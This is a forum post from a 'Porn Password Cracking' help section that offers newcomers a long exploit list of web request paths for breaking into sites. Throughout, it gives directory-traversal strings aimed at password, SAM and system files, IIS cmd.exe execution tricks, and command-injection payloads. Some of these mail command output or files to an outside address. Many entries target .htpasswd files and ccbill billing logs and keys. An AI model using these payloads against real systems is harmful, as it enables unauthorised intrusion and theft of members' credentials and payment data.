Go Back   Xisp.org Forums > Porn Password Cracking > Porn Password Cracking Help Section

Exploit lists (for those new to it)

Reply
Views: 15272 - Replies: 21  
Thread Tools Display Modes

Exploit lists (for those new to it)
Old 01-01-2006, 09:08 PM   #1
overkill
Guest
 
Posts: n/a
Threads: 5107
Smile Exploit lists (for those new to it)

This is for anyone who is new to exploiting and interested. I couldn't find any of these laying around on this forum so I thought I'd add some.

Warning: "they are about useless other than for curiosity, unless you know what to do whith them!"
Code:
/cgi-bin/add.cgi
/cgi-bin/nbmember.cgi
/cgi-bin/pass.cgi
/cgi-bin/usercontrol.cgi
/gateway/
.htaccess 
.htpasswd 
.htpasswrd 
.passwd 
.passwrd 
/ s.com/content/.htaccess
/%00.nsf/../lotus/domino/notes.ini 
/%00/ 
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts 
/%2e%2e/%2e%2e/%2e%2e/scandisk.log 
/%2E%2E/%2E%2E/Program%20Files/AnalogX/SimpleServer/www/server.log 
/%2ehtaccess 
/%2ehtpasswd
/%2ehtpasswd 
/%3f.jsp 
/*.jhtml/ 
/*.jsp/ 
/*.jsp::$DATA/ 
/*.shtml/ 
/*.shtml/login.jsp 
/."./."./Perl/eg/core/findtar 
/."./."./Perl/eg/core/findtar+&+echo+system(@ARGV);+>+c:\InetPub\wwwroot\cmd.pl+&+.pl 
/."./."./winnt/reapir/sam._%20.pl 
/....../ 
/......autoexec.bat 
/..../ 
/..../scandisk.log 
/.../ 
/.../.../scandisk.log 
/../../../../../../../boot.ini 
/../../../../config.sys 
/../../shadow 
/../../template/shared/indexTemplate.xml 
/../../winnt/win.ini%00examples/jsp/hello.jsp 
/../scandisk.log 
/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+ 
/..\..\..\winnt\repair\sam._ 
/./admin/ 
/./WEB-INF/ 
/./WEB-INF/web.xml 
/.access
/.box/../winnt/win.ini 
/.dS_store 
/.htaccess
/.HTACCESS.
/.HTACCESS. 
/.html/............/autoexec.bat 
/.htpass
/.htpasswd
/.htpasswd-girls
/.htpasswrd
/.jsp/WEB-INF/classes/Env.java 
/.members
/.ns4/../winnt/win.ini 
/.nsf/../lotus/domino/notes.ini 
/.nsf/../winnt/win.ini 
/.pass
/.passes
/.passwd
/.password
/.passwords
/.passwrd
/.photon/voyager/config.full 
/.pwd
/.userid.pwd
/.users
/.www.my.cnf 
//ccbill/ccbill-local.cgi
//ccbill/ccbill-local.cgi.old
//ccbill/ccbill-local.cgi-bak
//cgi-bin/
//cgi-bin/aglimpse
//cgi-bin/ccbill-local.cgi
//cgi-bin/ccbill-local.cgi.old
//cgi-bin/ccbill-local.cgi-bak
//cgi-bin/mastergate/passwords
//cgi-bin/mastergate/search.cgi
//cgi-bin/mastergate/search.cgi?search=0&search_on=all
//cgi-bin/WS_FTP.LOG
//pass/.htpasswd
//WEB-INF/ 
//WEB-INF/web.xml 
//WEB-INF/webapp.properties 
/?pageservices
/\.../ 
/_AuthChangeUrl 
/_mem_bin/auoconfig.asp 
/_mem_bin/remind.asp 
/_pages/ 
/_private/form_results.txt 
/_private/shopping_cart.mdb 
/_vti_bin
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\ 
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\ 
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\ 
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\ 
/_vti_bin/_vti_adm
/_vti_bin/_vti_adm/admin.dll
/_vti_bin/_vti_aut/dvwssr.dll 
/_vti_bin/_vti_aut/mtd2lv.dll 
/_vti_bin/fpcount.exe 
/_vti_bin/shtml.dll 
/_vti_bin/shtml.dll/tstt.htm 
/_vti_bin/shtml.exe 
/_vti_cnf
/_vti_cvt
/_vti_inf.htm
/_vti_inf.html
/_vti_inf.html 
/_vti_log/author.log 
/_vti_pvt 
/_vti_pvt/administrators.pwd
/_vti_pvt/authors.pwd
/_vti_pvt/service.pwd
/_vti_pvt/users.pwd
/~.htaccess
/~.htpasswd
/~.htpasswrd
/~.passwrd
/~/ 
/~admin
/~admin/
/~admin/ 
/~administrator
/~anime/.htpasswd
/~bin/ 
/~dat
/~data
/~guest/ 
/~log/ 
/~logs/ 
/~lp/ 
/~named/ 
/~nobody/ 
/~nobody/etc/ 
/~root
/~root/ 
/~temp
/~test/ 
/~tmp/ 
/+./ 
/+/ 
/++./ 
/++/ 
/2600-cgi/ezmlm-cgi 
/4DBin/_/../boot.ini 
/4DBin/_/../inetpub/../boot.ini 
/4DBin/_/../winnt/repair/sam._ 
/4DBin/_/C:/inetpub/../boot.ini 
/4DBin/_/C:/winnt/repair/sam._ 
/a%5c.aspx 
/a.jsp//..//..//..//..//..//../winnt/win.ini 
/a/ 
/access
/access.log
/access.txt
/access/ 
/access2/.htpasswd
/active.log
/active.log 
/ad.cgi?file=../../../../../../../../etc/hosts 
/adcycle/AdLogin.pm 
/add-passwd.cgi
/AdLogin.pm
/AdLogin.pm 
/admin
/admin.php?upload=1&file=config.php&file_name=tmp.txt&wdir=/images/&userfile=config.php&userfile_name=tmp.txt 
/admin.php3?admin=whatever 
/admin/
/admin/ 
/admin/.passwrd
/admin/?op=%c0 
/admin/case/case.filemanager.php/admin.php?op=move&confirm=1&do=copy&basedir=&file=/tmp/dat.dat&newfile=done.php 
/admin/ccbill-.cgi
/admin/ccbill-local.cgi
/admin/ccbill-local.cgi?cmd=MENU
/admin/ccbill-local.pl?cmd=MENU
/admin/includes/ 
/Admin/knowledge/dsmgr/users/GroupManager.asp 
/admin/password_manager/
/admin/users
/Admin_files/order.log 
/adminfiles
/administration/ 
/administrator
/administrator/index2.php?PHPSESSID=1&myname=admin&fullname=admin&userid=administrator 
/admin-serv/config/admpw 
/ads/admin.cgi 
/ads/adpassword.txt 
/adsamples/config/site.csc 
/advwebadmin 
/AdvWorks/equipment/catalog_type.asp 
/Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0 
/ana-bin/sitehtpass/
/anything.jsp 
/applist.asp 
/asearch.cnf 
/aspadmin/default.asp
/ASPSamp/AdvWorks/equipment/catalog_type.asp 
/AspUpload/Samples/Test11.asp 
/ats/.passwrd 
/ats/config
/ats/htpassrwd.txt 
/ats/htpasswd.txt 
/ats/logs/.pwd 
/auth.cgi
/backup
/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/hosts&id=1 
/basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=blah&password=blah 
/basilix/basilix.php?username=blah;ls 
/basilix/basilix.php3?username=blah;ls 
/bb.sqljsp//..//..//..//..//..//../winnt/win.ini 
/bigconf.cgi 
/billing
/bin
/bin/add-passwd.cgi
/bin/adduser.cgi
/bin/adduser.htm
/bin/adduser.html
/bin/admin
/bin/admin.cgi
/bin/admin.htm
/bin/admin.html
/bin/admin.pl
/bin/ccbill-local.cgi
/bin/ccbill-local.pl
/bin/common/user_update_admin.pl 
/bin/common/user_update_passwd.pl?user_id=V&firstname=FI&lastname=LA&course_id=SID&password1=NEWPWD&password2=NEWPWD 
/bin/htpasswd 
/bin/log
/bin/logs
/build.cgi 
/carbo.dll
/carbo.dll 
/CARD/
/card/agreview
/card/agreview/
/careerservices/careerhome.html
/cart/
/caspsamp/codebrws.asp?source=/caspsamp/../admin/conf/service.pwd 
/caspsamp/codebrws.asp?source=/caspsamp/../admin/logs/server 
/caspsamp/codebrws.asp?source=/caspsamp/../global_odbc.ini 
/caspsamp/codebrws.asp?source=/caspsamp/../LICENSE.LIC 
/caspsamp/codebrws.asp?source=/caspsamp/../logs/server-3000 
/casses/econ101/alexander/fall02
/casses/econ301/bose/index.htm
/catalog.nsf 
/cavecreekleavemypasswordfilealone/.htpasswd
/ccbill
/ccbill 
/ccbill.log 
/ccbill/
/ccbill/ 
/ccbill/.memberfile
/ccbill/_vti_cnf/
/ccbill/ccbill-.cgi 
/ccbill/ccbill-local.cgi
/ccbill/ccbill-local.pl
/ccbill/male/password/.htpasswd
/ccbill/members/.htpasswd
/ccbill/Msbilllog.txt
/ccbill/newpass.txt 
/ccbill/password/.htpassfile
/ccbill/password/.htpasswd
/ccbill/password/.htpasswd.410 
/ccbill/password/.htpasswd.bak
/ccbill/password/.htpasswd20227 
/ccbill/password/.htpasswd-bak 
/ccbill/password_manager/
/ccbill/secure/.htnew
/ccbill/secure/.htpasswd 
/ccbill/secure/cbill.log 
/ccbill/secure/ccbill.log
/cc-bill/secure/ccbill.log
/ccbill/secure/ccbill.log 
/ccbill/secure/current.log
/ccbill/secure/current.log-bak
/ccbill/secure/history.dat
/ccbill/secure/password
/ccbill/secure/private_key
/ccbill/secure/purge
/ccbill/secure/secure/ccbill.log 
/ccbill/secure/WS_FTP.LOG 
/ccbill/secured/
/ccbill/secured/current.log-bak
/ccbill/welcome.htm
/ccbill/whereami.cgi
/ccbill2/.htpasswd
/ccbill2/access.log
/ccbill2/male/password/.htpasswd
/ccbill2/password/.htpassfile
/ccbill2/password/.htpasswd
/ccbill2/password_manager/
/ccbill2/secure/.htpasswd
/ccbill2/secure/current.log
/ccbill2/secured/.htpasswd
/ccbill2/secured/current.log
/ccbill5/secure/ccbill.log 
/ccbill-local.cgi
/ccbill-local.pl
/cd/../config/html/cnf_gi.htm 
/cenik
/cfbin/board.cgi 
/cfdocs/cfmlsyntaxcheck.cfm 
/cfdocs/exampleapp/docs/sourcewindow.cfm?Template= 
/cfdocs/exampleapp/email/getfile.cfm 
/cfdocs/exampleapp/publish/admin/addcontent.cfm
/cfdocs/exampleapp/publish/admin/addcontent.cfm 
/CFDOCS/exampleapps/ 
/cfdocs/examples/CVLibrary/GetFile.CFM?FT=Text&FST=Plain&FilePath=C:\boot.ini 
/cfdocs/expelval/displayopenedfile.cfm
/cfdocs/expelval/displayopenedfile.cfm 
/cfdocs/expelval/exprcalc.cfm
/cfdocs/expelval/exprcalc.cfm 
/cfdocs/expelval/openfile.cfm
/cfdocs/expelval/openfile.cfm 
/cfdocs/expelval/sendmail.cfm
/cfdocs/expelval/sendmail.cfm 
/cfdocs/expeval/displayopenedfile.cfm 
/cfdocs/expeval/eval.cfm 
/cfdocs/expeval/exprcalc.cfm 
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/openfile.cfm 
/cfdocs/expeval/sendmail.cfm 
/cfdocs/snippets/evaluate.cfm 
/cfdocs/snippets/fileexists.cfm 
/cfdocs/snippets/setlocale.cfm 
/cfdocs/snippets/viewexample.cfm?Tagname= 
/cg-bin/ 
/cgi
/cgi/ 
/cgi/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/cgi/..%5c../..%5c../winnt/system32/cmd.exe
/cgi/..?../winnt/system32/cmd.exe
/cgi/..?..?..?../winnt/system32/cmd.exe
/cgi/~auth.cgi
/cgi/~auth.cgi 
/cgi/~cgi-win
/cgi/~cgi-win 
/cgi/add.cgi 
/cgi/add_user.cgi
/cgi/add_user.cgi 
/cgi/add-passwd.cgi
/cgi/adduser.cgi
/cgi/adduser.htm
/cgi/adduser.html
/cgi/admin
/cgi/admin.cgi
/cgi/admin.cgi 
/cgi/admin.htm
/cgi/admin.html
/cgi/admin.pl
/cgi/aglimpse
/cgi/aglimpse 
/cgi/aglimspe
/cgi/aglimspe 
/cgi/anyform2
/cgi/AnyForm2 
/cgi/at-admin.cgi
/cgi/AT-admin.cgi 
/cgi/auth.cgi
/cgi/auth.cgi 
/cgi/bin/test.txt;%20/bin/ls 
/cgi/bnbform.cgi
/cgi/bnbform.cgi 
/cgi/campas
/cgi/campas 
/cgi/cart32.exe
/cgi/check.bat/..%5c../..%5cwinnt/system32/cmd.exe
/cgi/check.bat/..?..?..?winnt/system32/cmd.exe
/cgi/classifieds.cgi
/cgi/classifieds.cgi 
/cgi/commerce.cgi?page=../../../../etc/hosts%00index.html 
/cgi/count.cgi
/cgi/count.cgi 
/cgi/cvsweb.cgi 
/cgi/database/.htpasswd
/cgi/DCShop/auth_data/auth_user_file.txt
/cgi/DCShop/orders/orders.txt
/cgi/econ102/
/cgi/econ102/ike
/cgi/econ102/ike/
/cgi/econ102/ike/4ike5.exe
/cgi/environ.cgi
/cgi/environ.cgi 
/cgi/eurodebit/data/passwd.txt 
/cgi/faxsurvey
/cgi/faxsurvey 
/cgi/filemail.pl
/cgi/filemail.pl 
/cgi/files.pl
/cgi/files.pl 
/cgi/finger
/cgi/finger 
/cgi/handler
/cgi/handler 
/cgi/htmlscript
/cgi/htmlscript 
/cgi/info2www
/cgi/info2www 
/cgi/jj
/cgi/jj 
/cgi/log
/cgi/logs
/cgi/maillist.pl
/cgi/maillist.pl 
/cgi/man.sh
/cgi/man.sh 
/cgi/mastergate/.htpasswd
/cgi/matergate/add.cgi 
/cgi/nph-test.cgi
/cgi/nph-test.cgi 
/cgi/nph-test-cgi
/cgi/nph-test-cgi 
/cgi/orders/orders.txt
/cgi/pagelog.cgi
/cgi/PDG_Cart/order.log
/cgi/perl.exe
/cgi/perl.exe 
/cgi/pfdisplay.cgi
/cgi/pfdisplay.cgi 
/cgi/phf
/cgi/phf 
/cgi/php.cgi
/cgi/php.cgi 
/cgi/pin.txt
/cgi/pincodes.txt
/cgi/rguest.exe
/cgi/rguest.exe 
/cgi/sentry/admin/ 
/cgi/shop/auth_data/auth_user_file.txt
/cgi/shop/orders/orders.txt
/cgi/survey.cgi
/cgi/survey.cgi 
/cgi/test.cgi
/cgi/test.cgi 
/cgi/test-cgi
/cgi/test-cgi 
/cgi/textcounter.pl
/cgi/textcounter.pl 
/cgi/unlg1.1
/cgi/unlg1.1 
/cgi/view.sh
/cgi/view.sh 
/cgi/view-source
/cgi/view-source 
/cgi/webdist.cgi
/cgi/webdist.cgi 
/cgi/webgais
/cgi/webgais 
/cgi/websendmail
/cgi/websendmail 
/cgi/wguest.exe
/cgi/wguest.exe 
/cgi/wwwboard.pl
/cgi/wwwboard.pl 
/cgi/www-sql
/cgi/www-sql 
/cgi_bin/DCShop/orders/orders.txt
/cgi_bin/shop/orders/orders.txt
/cgi-bill/.htaccess 
/cgi-bill/.passwd 
/cgi-bill/admin/htpasswrd.txt 
/cgi-bill/passwrd.log 
/cgibin
/cgi-bin
/cgi-bin 
/cgibin/
/cgi-bin/
/cgibin/ 
/cgi-bin/ 
/cgi-bin/.
/cgi-bin/.%2e.%2e/winnt/system32/cmd.exe
/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe
/cgi-bin/.%2e/.%2e/winnt/system32/cmd.exe
/cgi-bin/..%2e..%2ewinnt/system32/cmd.exe
/cgi-bin/..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe
/cgi-bin/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe
/cgi-bin/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
/cgi-bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe
/cgi-bin/..%5c..%5c..%5c..%5cwin2000/system32/cmd.exe
/cgi-bin/..%5c..%5c..%5c..%5cwindows/system32/cmd.exe
/cgi-bin/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
/cgi-bin/..%5c..%5c..%5cwinnt/system32/cmd.exe
/cgi-bin/..%5c..%5cwinnt/system32/cmd.exe
/cgi-bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/cgi-bin/..%5c../..%5c../winnt/system32/cmd.exe
/cgi-bin/............winntsystem32cmd.exe
/cgi-bin/..?../..?../..?../winnt/system32/cmd.exe
/cgi-bin/..?../winnt/system32/cmd.exe
/cgi-bin/..?..?winnt/system32/cmd.exe
/cgi-bin/..?8s../..?8s../..?8s../winnt/system32/cmd.exe
/cgi-bin/..?9v../..?9v../..?9v../winnt/system32/cmd.exe
/cgi-bin/..?pc../..?pc../..?pc../winnt/system32/cmd.exe
/cgi-bin/..?pc../winnt/system32/cmd.exe
/cgi-bin/..?qf../..?qf../..?qf../winnt/system32/cmd.exe
/cgi-bin/..o../..o../..o../winnt/system32/cmd.exe
/cgi-bin/..o../winnt/system32/cmd.exe
/cgi-bin/.adminpass.txt
/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi 
/cgi-bin/.fhp 
/cgi-bin/.htpasswd
/cgi-bin/.passwd
/cgi-bin/.passwords
/cgi-bin/.www.my.cnf 
/cgi-bin/_log/.htpasswd
/cgi-bin/~auth.cgi
/cgi-bin/~auth.cgi 
/cgi-bin/~logs/mastergate
/cgi-bin/14all.cgi?cfg=../../../../../../../../etc/hosts 
/cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/hosts 
/cgi-bin/2000Charge_167091.cgi?vercode=login:pass:kneegnot:add:0
/cgi-bin/a1stats/a1disp.cgi?|/bin/ls| 
/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/hosts 
/cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/hosts 
/cgi-bin/abracadabra.bat
/cgi-bin/abuse.man?file=&domain=&script= 
/cgi-bin/ad.cgi?file=../../../../../../../../etc/hosts 
/cgi-bin/adcycle/adcenter.cgi 
/cgi-bin/add.cgi
/cgibin/add.cgi 
/cgi-bin/add.cgi 
/cgi-bin/add_ftp.cgi 
/cgi-bin/add_user.cgi
/cgi-bin/add_user.cgi 
/cgibin/add-passwd.cgi
/cgi-bin/add-passwd.cgi
/cgi-bin/adduser.cgi
/cgi-bin/adduser.htm
/cgi-bin/adduser.html
/cgi-bin/admin
/cgi-bin/admin.cgi
/cgi-bin/admin.cgi 
/cgi-bin/admin.htm
/cgi-bin/admin.html
/cgi-bin/admin.pl
/cgi-bin/admin/a-ibill.cgi
/cgi-bin/adpassword.txt
/cgi-bin/adpassword.txt 
/cgi-bin/ads.cgi 
/cgi-bin/af.cgi?_browser_out=|/bin/ls| 
/cgi-bin/agents/add.cgi 
/cgi-bin/aglimpse
/cgi-bin/aglimpse 
/cgi-bin/alibaba.pl 
/cgi-bin/aliredir.exe 
/cgi-bin/allmanage.cgi 
/cgi-bin/allmanage.pl 
/cgibin/amadmin.pl?setpasswd
/cgibin/amadmin.pl?setpasswd 
/cgi-bin/anacondaclip.pl?template=../../../../../../../../../../../../etc/hosts 
/cgi-bin/anyform2
/cgi-bin/AnyForm2 
/cgi-bin/at-admin.cgi
/cgi-bin/AT-admin.cgi 
/cgi-bin/auction/auction.pl?action=tst 
/cgi-bin/auctiondeluxe/auction.pl?action=tst 
/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/hosts 
/cgi-bin/auth.cgi
/cgi-bin/auth.cgi 
/cgi-bin/authadmin/admin.cgi
/cgi-bin/autorank/accounts.cgi
/cgi-bin/awl/auctionweaver.pl 
/cgi-bin/awl/auctionweaver.pl?flag1=1&catdir=\..\..\..\..\..\..\..\..\&fromfile=Boot.ini 
/cgi-bin/Backup/add-passwd.cgi
/cgi-bin/bb-ack.sh 
/cgi-bin/bb-hist.sh?HISTFILE=../../../../../../etc/hosts 
/cgi-bin/bb-hist.sh?HISTFILE=/home/* 
/cgi-bin/bb-histlog.sh 
/cgi-bin/bb-hostsvc.sh 
/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/hosts 
/cgi-bin/bb-rep.sh 
/cgi-bin/bb-replog.sh 
/cgi-bin/bbs_forum.cgi?forum=test&read=../bbs_forum.cgi 
/cgi-bin/bigconf.cgi 
/cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbname=;ls|mail%20swoopme@@hotmail.com|&f6=^a.*&action=searchdbdisplay 
/cgi-bin/blat.exe 
/cgi-bin/bnbform 
/cgi-bin/bnbform.cgi
/cgi-bin/bnbform.cgi 
/cgi-bin/bnbform.pl 
/cgi-bin/board.cgi 
/cgi-bin/boozt/admin/index.cgi
/cgi-bin/boozt/admin/index.cgi 
/cgi-bin/bsguest.cgi?email=x;ls 
/cgi-bin/bslist.cgi?email=x;ls 
/cgi-bin/build.cgi 
/cgi-bin/cached_feed.cgi?../../../.+/etc/hosts 
/cgi-bin/cachemgr.cgi 
/cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/hosts%00 
/cgi-bin/calender.pl 
/cgi-bin/calender_admin.pl 
/cgi-bin/campas
/cgi-bin/campas 
/cgi-bin/carbo.dll 
/cgibin/cart.pl
/cgi-bin/cart.pl
/cgi-bin/cart32.exe
/cgi-bin/cart32.exe/cart32clientlist
/cgi-bin/cart32.exe/error
/cgi-bin/cart32.exe/expdate 
/cgi-bin/cart32/CART32-order.txt
/cgi-bin/cart32/whatever-OUTPUT.txt
/cgi-bin/CatalogMgr.pl
/cgi-bin/CatalogMgr.pl?cartID=366&template=CatalogMgr.pl 
/cgi-bin/ccbill-local.pl
/cgi-bin/ccpass/passwords/.htpasswd 
/cgi-bin/ccpass/passwords/.pass 
/cgi-bin/cgiemail/uargg.txt?0=0&1=1&2=2&256=256&array=array&a=a&i=i&c=c&arr=arr 
/cgi-bin/cgiforum.cgi?thesection=../../../../../../etc/hosts%00 
/cgi-bin/cgiforum.pl?thesection=../../../../../../etc/hosts%00 
/cgi-bin/cgimail.exe 
/cgi-bin/CGImail.exe?%24Attach%24=file.txt&%24To%24=swoopme@hotmail.com 
/cgi-bin/cgitest.exe 
/cgi-bin/cgiwrap 
/cgi-bin/check.bat/..%5c../..%5cwinnt/system32/cmd.exe
/cgi-bin/check.bat/..?..?..?winnt/system32/cmd.exe
/cgi-bin/classifieds.cgi
/cgi-bin/classifieds.cgi 
/cgi-bin/click.cgi
/cgi-bin/clickresponder.pl 
/cgi-bin/commander.pl 
/cgi-bin/commerce.cgi?page=../../../../etc/hosts%00index.html 
/cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls| 
/cgi-bin/console.exe?page_size= 
/cgi-bin/cookmail 
/cgi-bin/cookmail/cookmail 
/cgi-bin/cookmail/cookmail.exe 
/cgi-bin/core 
/cgi-bin/count.cgi
/cgi-bin/Count.cgi 
/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id 
/cgi-bin/cpmdaemon.cgi 
/cgi-bin/cs.exe?action= 
/cgi-bin/csvform.pl?file=/bin/ls%00| 
/cgi-bin/cvsweb.cgi 
/cgi-bin/cwmail.ini 
/cgi-bin/day5datacopier.cgi
/cgi-bin/day5datacopier.cgi 
/cgi-bin/day5datanotifier.cgi
/cgi-bin/day5datanotifier.cgi 
/cgi-bin/db2www.exe/../../db2www.ini 
/cgi-bin/db2www/../../db2www.ini 
/cgi-bin/db2www/library/document.d2w/report?uid=UNKNOWN&pwd=&search_type=SIMPLE&r_host=&last_page=db2www0022.html&fn=db2www.html 
/cgi-bin/dcboard.cgi 
/cgi-bin/dcforum.cgi?az=list&file=filename%00 
/cgi-bin/dcforum/dcboard.cgi
/cgi-bin/dcforum/dcboard.cgi 
/cgi-bin/dcforum/dcforum.cgi?az=list&file=filename%00 
/cgi-bin/dcforum/install_help.cgi 
/cgi-bin/dcguest.cgi 
/cgi-bin/dcguest/dcguest.cgi 
/cgibin/DCShop/auth_data/auth_user_file.txt
/cgi-bin/DCShop/auth_data/auth_user_file.txt
/cgi-bin/DCShop/Auth_data/auth_user_file.txt 
/cgibin/DCShop/orders/orders.txt
/cgi-bin/DCShop/orders/orders.txt
/cgi-bin/DCShop/Orders/orders.txt 
/cgi-bin/debug.cgi 
/cgi-bin/debug.pl 
/cgi-bin/dfire.cgi 
/cgi-bin/directorypro.cgi?want=showcat&show=../../../..//etc/hosts%00 
/cgi-bin/disk2server.cgi 
/cgi-bin/download.cgi?s=path&c=txt&f=fn 
/cgi-bin/download.pl?s=path&c=txt&f=fn 
/cgi-bin/dumpenv.pl
/cgi-bin/dumpenv.pl 
/cgi-bin/echo 
/cgi-bin/echo.bat 
/cgi-bin/echo2 
/cgi-bin/edit.pl 
/cgi-bin/empower?DB=mungowitsch 
/cgi-bin/environ.cgi
/cgi-bin/environ.cgi 
/cgi-bin/environ.pl 
/cgi-bin/eshop.pl?seite=;ls| 
/cgi-bin/EuroDebit/addusr.pl
/cgi-bin/everythingform.cgi?config=../../../../../../../../bin/ping&Name=xx&e-mail=swoopme@hotmail.com 
/cgi-bin/excite 
/cgi-bin/eyehack.exe
/cgi-bin/ezmall2000/mall2000.cgi
/cgi-bin/ezmlm-cgi 
/cgi-bin/ezshopper2/loadpage.cgi?id+/ 
/cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/ 
/cgi-bin/faxsurvey
/cgi-bin/faxsurvey 
/cgi-bin/fi 
/cgi-bin/filemail.pl
/cgi-bin/filemail.pl 
/cgi-bin/files.pl
/cgi-bin/files.pl 
/cgi-bin/finger
/cgi-bin/finger 
/cgi-bin/finger.cgi 
/cgi-bin/finger.cgi?action=archives&cmd=specific&&filename=99.10.28.15.23.username.|/bin/ls| 
/cgi-bin/finger?@host 
/cgi-bin/finger?@localhost
/cgi-bin/finger?@localhost 
/cgi-bin/flexform.cgi 
/cgi-bin/fom/fom.cgi?cmd=&file=1&keywords=x 
/cgi-bin/foo.cmd?xxx&dir 
/cgi-bin/form.cgi
/cgi-bin/forma 
/cgi-bin/formhandler.cgi 
/cgi-bin/formhandler/formhandler.cgi 
/cgi-bin/FormMail.cgi
/cgi-bin/formmail.cgi 
/cgi-bin/formmail.pl
/cgi-bin/formmail.pl 
/cgi-bin/formprocessor.asp?MailTo=swoopme@hotmail.com&MailFrom=tst@no.net&Message=tst&MailTemplate1=/cgi-bin/formprocessor.asp 
/cgi-bin/formto.pl 
/cgi-bin/form-to-mail.cgi?_out_file=mungo.dat&x=y 
/cgi-bin/formvar.exe 
/cgi-bin/forum.pl 
/cgi-bin/forum-admin.pl 
/cgi-bin/forumdisplay.cgi 
/cgi-bin/forums/dcboard.cgi 
/cgi-bin/fpexplore.exe 
/cgi-bin/free_add.cgi
/cgi-bin/ftp/ftp.pl?dir=../../../../../../etc 
/cgi-bin/ftpdiag.cgi 
/cgi-bin/futureforum.cgi 
/cgi-bin/futureforum3.cgi 
/cgi-bin/gbook.cgi?_MAILTO=xx;ls 
/cgi-bin/gbook/gbook.cgi 
/cgi-bin/get16.exe 
/cgi-bin/get32.exe 
/cgi-bin/getcomments.pl 
/cgi-bin/getdoc.cgi 
/cgi-bin/gettext.pl 
/cgi-bin/glimpse 
/cgi-bin/globill_ut.cgi
/cgi-bin/guestadd.pl 
/cgi-bin/guestbook.cgi
/cgi-bin/guestbook.cgi 
/cgi-bin/guestserver.cgi?email=|ls|swoopme@hotmail.com 
/cgi-bin/GW5/GWWEB.EXE?HELP=../../../../../index 
/cgi-bin/GW5/GWWEB.EXE?HELP=bad-request 
/cgi-bin/handler
/cgi-bin/handler 
/cgi-bin/handler.cgi
/cgi-bin/handler.cgi 
/cgi-bin/handler?cat%20/etc/passwd
/cgi-bin/hello.bat 
/cgi-bin/hsx.cgi?show=../../../../../../../etc/hosts%00 
/cgi-bin/HtAccess.pl?
/cgibin/htgrep/file=index.html&hdr=/etc/hosts 
/cgi-bin/htgrep/file=index.html&hdr=/etc/hosts 
/cgi-bin/htimage.exe 
/cgi-bin/htmanage.cgi?
/cgi-bin/html_page?TEMPLATE=main 
/cgi-bin/htmlscript
/cgi-bin/htmlscript 
/cgi-bin/htpasswd2
/cgi-bin/htsearch
/cgi-bin/htsearch?exclude=%60%60 
/cgi-bin/httpodbc.dl
/cgi-bin/hwtestio 
/cgi-bin/i.pl 
/cgi-bin/ib/.htpasswd
/cgi-bin/ib/data/
/cgi-bin/ib/data/.memberfile
/cgi-bin/ib/data/htpasswd
/cgi-bin/ib/data/passwdfile
/cgi-bin/ib/htpasswd
/cgi-bin/ib/search.cgi
/cgi-bin/ibill/.htpasswd 
/cgi-bin/ibillam.pl 
/cgi-bin/ibillbh.pl
/cgi-bin/ibillbp.pl 
/cgi-bin/ibillcb.pl 
/cgi-bin/ibillnm.pl 
/cgi-bin/ibillpm.pl
/cgi-bin/ibillpm.pl 
/cgi-bin/ibillram.pl 
/cgi-bin/ibillsxmm.pl
/cgi-bin/ibillto.pl
/cgi-bin/iconboard/register.cgi?SEND_MAIL=/bin/ls 
/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/hosts%00 
/cgi-bin/imagemap.exe 
/cgi-bin/imapcern.exe 
/cgi-bin/imapncsa.exe 
/cgi-bin/info2www
/cgi-bin/info2www 
/cgi-bin/infogate 
/cgi-bin/infosrch.cgi 
/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id 
/cgi-bin/input.bat 
/cgi-bin/input2.bat 
/cgi-bin/irp2/irpTrack.pl
/cgi-bin/irp2/irpTrack.pl/420/ccbill/secure/ccbill.log 
/cgi-bin/jj
/cgi-bin/jj 
/cgi-bin/lastlines.cgi 
/cgi-bin/lb5000/search.cgi 
/cgi-bin/leave-link.cgi?file=mungo.dat&url=hoschi.net 
/cgi-bin/loadpage.cgi
/cgi-bin/loadpage.cgi 
/cgi-bin/log
/cgi-bin/log/
/cgi-bin/-log/.htpasswd
/cgi-bin/log/mastergate
/cgi-bin/log/Msbilllog.txt
/cgi-bin/logs
/cgibin/logs/
/cgibin/logs/.htpasswd
/cgibin/logs/.memberfile
/cgi-bin/logs/htpasswd
/cgi-bin/logs/mastergate
/cgi-bin/lsin.exe 
/cgi-bin/lsindex2.bat 
/cgi-bin/mail.cgi 
/cgi-bin/mailfile.cgi?real_name=rc&email=swoopme@hotmail.com&filename=mailfile.cgi 
